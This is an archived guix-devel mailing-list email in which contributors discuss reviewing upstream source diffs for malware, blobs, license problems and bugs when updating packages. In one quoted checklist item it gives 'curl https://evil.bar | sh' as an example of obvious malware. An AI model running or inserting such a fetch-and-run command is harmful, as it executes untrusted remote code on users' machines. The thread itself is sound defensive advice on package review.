From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: from mp10.migadu.com ([2001:41d0:2:bcc0::]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)) by ms0.migadu.com with LMTPS id gzesAcHJSGLFLAAAgWs5BA (envelope-from ) for ; Sun, 03 Apr 2022 00:10:09 +0200 Received: from aspmx1.migadu.com ([2001:41d0:2:bcc0::]) (using TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits)) by mp10.migadu.com with LMTPS id uN6ENMDJSGJiIwEAG6o9tA (envelope-from ) for ; Sun, 03 Apr 2022 00:10:08 +0200 Received: from lists.gnu.org (lists.gnu.org [209.51.188.17]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by aspmx1.migadu.com (Postfix) with ESMTPS id 8C9B238746 for ; Sun, 3 Apr 2022 00:10:04 +0200 (CEST) Received: from localhost ([::1]:53964 helo=lists1p.gnu.org) by lists.gnu.org with esmtp (Exim 4.90_1) (envelope-from ) id 1nalwZ-0004ng-9G for larch@yhetil.org; Sat, 02 Apr 2022 18:10:03 -0400 Received: from eggs.gnu.org ([209.51.188.92]:59282) by lists.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1nalwI-0004n4-UM for guix-devel@gnu.org; Sat, 02 Apr 2022 18:09:46 -0400 Received: from mx.kolabnow.com ([212.103.80.153]:23160) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1nalwF-00022J-Qi for guix-devel@gnu.org; Sat, 02 Apr 2022 18:09:45 -0400 Received: from localhost (unknown [127.0.0.1]) by mx.kolabnow.com (Postfix) with ESMTP id 8E50542320; Sun, 3 Apr 2022 00:09:41 +0200 (CEST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=kolabnow.com; h= content-transfer-encoding:content-type:content-type:mime-version :message-id:in-reply-to:date:date:subject:subject:from:from :references:received:received:received; s=dkim20160331; t= 1648937380; x=1650751781; bh=pbiBmNORBtrYy8kFEJKYMwi1L4auF2ChsO2 Kc5Jvwls=; b=PLHS3MknQsrbjIk4PE3rFjTyD4sNffpHEgO9Z2PA67M+tafpkIM 0cl9iXmOsY+nb78eXKCfa3tJdg0Z1W2tTisXXyxg8S5S+MY3QBdd8yzGClL60xMe Wt7P0c4I35Gbla/C52EJEh1hV09AfmzO3hhFjHcC+O4NWKUs8FQLXseX+XDJnz43 nM+JHl/v9dFaYWSnflbBtjQEsBYUoc1rDnFDaP+eYlPKiP5TjPTJUth1DR8FE7EO 1qeEqiZTeh4ePyLzA9OtQeYoPKu3MEZvVhjdX6rNS9Pn0kI8O9iUB9ZnrR2KHWok uxTl5bUXO0FTsj9mMbrJfQhrsjY7OWdmXUUx/K2GNwLUg8eLpriEQG2D/COwBva0 Zo9D7VUW5jQGAjhheDNb8QvOeAhc7FmoFMqfaNuOmfdHMThL51slxW2zvG1gtuFw cDeihOTIkIMbyO4FkCjgpn6LMfiP13uCrKn9AWCUib9uNEqrrO22PX2A/179qGPw BAjMK0Z5RASSXn/HOAXIyn/M2wA08zFxPxQB5d7Z9N/nOZOHcLPdlLO6PzWID3sH h7utre3mFSM617CE6QfmrfWjI9Q1Ru5aDHbRA10H9qJwV9LPkL8Y7yjx9+hJ9yZ0 eZRJ0AAgvka4hCzFU8+nH2lgz1uzWrOYFiKCNS2v0OwR/Hmpw7coDrb0= X-Virus-Scanned: amavisd-new at mykolab.com Received: from mx.kolabnow.com ([127.0.0.1]) by localhost (ext-mx-out003.mykolab.com [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id G-rtspMd9BiX; Sun, 3 Apr 2022 00:09:40 +0200 (CEST) Received: from int-mx003.mykolab.com (unknown [10.9.13.3]) by mx.kolabnow.com (Postfix) with ESMTPS id 2A4DF42206; Sun, 3 Apr 2022 00:09:39 +0200 (CEST) Received: from ext-subm001.mykolab.com (unknown [10.9.6.1]) by int-mx003.mykolab.com (Postfix) with ESMTPS id BEF8737CC; Sun, 3 Apr 2022 00:09:39 +0200 (CEST) References: <0035734f12073a2f50d41641f66dacc35e2e6a2c.camel@telenet.be> <87y20ogqjl.fsf@kolabnow.com> <524c815e2d10f4012eb5f0192755b76b2297af6b.camel@telenet.be> From: Thiago Jung Bauermann To: Maxime Devos Cc: guix-devel@gnu.org Subject: Re: Reviewing the diff when updating a package? Date: Sat, 02 Apr 2022 18:48:10 -0300 In-reply-to: <524c815e2d10f4012eb5f0192755b76b2297af6b.camel@telenet.be> Message-ID: <87lewn87du.fsf@kolabnow.com> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: quoted-printable Received-SPF: pass client-ip=212.103.80.153; envelope-from=bauermann@kolabnow.com; helo=mx.kolabnow.com X-Spam_score_int: -20 X-Spam_score: -2.1 X-Spam_bar: -- X-Spam_report: (-2.1 / 5.0 requ) BAYES_00=-1.9, DKIM_SIGNED=0.1, DKIM_VALID=-0.1, DKIM_VALID_AU=-0.1, DKIM_VALID_EF=-0.1, SPF_HELO_NONE=0.001, SPF_PASS=-0.001, T_SCC_BODY_TEXT_LINE=-0.01 autolearn=ham autolearn_force=no X-Spam_action: no action X-BeenThere: guix-devel@gnu.org X-Mailman-Version: 2.1.29 Precedence: list List-Id: "Development of GNU Guix and the GNU System distribution." List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: guix-devel-bounces+larch=yhetil.org@gnu.org Sender: "Guix-devel" X-Migadu-Flow: FLOW_IN X-Migadu-To: larch@yhetil.org X-Migadu-Country: US ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=yhetil.org; s=key1; t=1648937404; h=from:from:sender:sender:reply-to:subject:subject:date:date: message-id:message-id:to:to:cc:cc:mime-version:mime-version: content-type:content-type: content-transfer-encoding:content-transfer-encoding: in-reply-to:in-reply-to:references:references:list-id:list-help: list-unsubscribe:list-subscribe:list-post:dkim-signature; bh=pbiBmNORBtrYy8kFEJKYMwi1L4auF2ChsO2Kc5Jvwls=; b=Yk3STYo7mfESUmEgCr6e+HIWz/58+CRo7eRKY/x0kesmvHQMcOZKWp62FKorxUusdlG8VX ajMHxS2tydFY4+Ix8GMwLLvIRd6s9A0WwEugUqTW0Ok0ajpF2eAJF1vrGademXCCSsz2ay S+nUkJNhGUkIuhczk+vj0AY1wxWMdRXhis9/vHfS4A1OQf9OTvribdqOqmb6C+0pm5j4W2 oSdQg/2G8EOmQmkuzBIz4szM8v7Fpz7eGWph91qp171VrBS7IoPclxxLC0NKeQXbKvwlNm 6C4MKT9wrHU7gmTeRLlo7X58aHIZNlqbqmAMaW3kNrNq+M/0L0l0J+vNkOs9jg== ARC-Seal: i=1; s=key1; d=yhetil.org; t=1648937404; a=rsa-sha256; cv=none; b=QXRdNAF4rWBhCNighXRsU3TU8Z0Zk+n7kGYkKKVOCz+ht/P2Na0J0S6EpGbcbSizBodfp8 UPM+2Kgg6dqhz3PqM964eCAeZQcf/YukGm2ODFhr5KZe/FnL+qevoIVOOntSZVyAx4HYmK khViBVCrzg0WwRa8lWb/RQLhhHLNgEcTREAXH3F2tXeP8tnuqyMLw+f6ctNmt44mnF2XqI ACgih05Y175ZGI0qay+IoSLc3xc3MOJFRh+9vm1MMP5sOn3bF2lgygDlLvyr4jyvA3fIX0 4l6/YXnAzJf4YZ4lcMzXqx6vbpJkhMRRjYsxnjLh7Wvj3250eXolmtPv/bje4w== ARC-Authentication-Results: i=1; aspmx1.migadu.com; dkim=pass header.d=kolabnow.com header.s=dkim20160331 header.b=PLHS3Mkn; dmarc=pass (policy=quarantine) header.from=kolabnow.com; spf=pass (aspmx1.migadu.com: domain of "guix-devel-bounces+larch=yhetil.org@gnu.org" designates 209.51.188.17 as permitted sender) smtp.mailfrom="guix-devel-bounces+larch=yhetil.org@gnu.org" X-Migadu-Spam-Score: -4.88 Authentication-Results: aspmx1.migadu.com; dkim=pass header.d=kolabnow.com header.s=dkim20160331 header.b=PLHS3Mkn; dmarc=pass (policy=quarantine) header.from=kolabnow.com; spf=pass (aspmx1.migadu.com: domain of "guix-devel-bounces+larch=yhetil.org@gnu.org" designates 209.51.188.17 as permitted sender) smtp.mailfrom="guix-devel-bounces+larch=yhetil.org@gnu.org" X-Migadu-Queue-Id: 8C9B238746 X-Spam-Score: -4.88 X-Migadu-Scanner: scn0.migadu.com X-TUID: 2x7HeVLbqxim Hello Maxime, Thank you for such a detailed answer to my question. I appreciate it. Maxime Devos writes: > Thiago Jung Bauermann schreef op vr 01-04-2022 om 22:59 [-0300]: >> Hello Maxime, >>=20 >> Maxime Devos writes: >>=20 >> > Patch is not yet ready (I'm looking at the source code diff for >> > anything =E2=80=98suspicious=E2=80=99), just reserving a bug number an= d avoiding double >> > work.=C2=A0 Will send an actual patch later. >>=20 >> I hope you don't mind me asking what do you mean by =E2=80=98suspicious= =E2=80=99? >>=20 >> Is it reviewing the code for security concerns? > > That (to a limited degree), and other things. > >> I ask because I've wondered sometimes whether contributors updating a >> package to a new version should review the new source code. > > I don't think it's feasible for, say, large things like GCC and Linux. > But for smaller things with smaller diffs, say a hypothetical npm- > event-stream package, it would easily avoid things like the compromise > described in . > > While we cannot feasibly protect users against more =E2=80=98hidden=E2=80= =99 malware > (e.g. some non-obvious remote code execution in C that then will be > exploited by the upstream authors), the more obvious =E2=80=98here's a bl= ob you > don't need to look at=E2=80=99 seems detectable. I think =E2=80=98no mal= ware (AFAWCT)=E2=80=99 > is an important property of a distribution. Indeed. That's a very sensible approach. Just because we can't hope to detect all malicious changes, doesn't mean we can't attempt to catch the more obvious malicious changes which, as your example shows, are actually found in the wild. > I look for the following things: > > 1. additional bundled software > 2. code with a different license than mentioned in the 'license' > field (especially if it's propietary) > 3. =E2=80=98obvious=E2=80=99 malware like: curl https://evil.bar | sh -= in a > 4. blobs (possibly hiding malware) > 5. things that look like bugs (e.g. not checking the return value of > 'malloc' for NULL, not escaping things written to HTML documents > ...) > > I think I can reliably detect (1,3,4). I sometimes detect (5) but not > detecting (5) (*) doesn't mean there are no bugs, I just quickly scroll > through the code and don't do any detailed analysis > > (*) more specifically, some code not checking for NULL and an URL being > embedded in the 'href' attribute of an XML element without escaping. Wow, that's very thorough. Thank you for all this care with package updates. This is very useful guidance when creating/reviewing patches that update packages. I'll take a stab at adding this information to the =E2=80=9CSubmi= tting Patches=E2=80=9D section of the manual. --=20 Thanks Thiago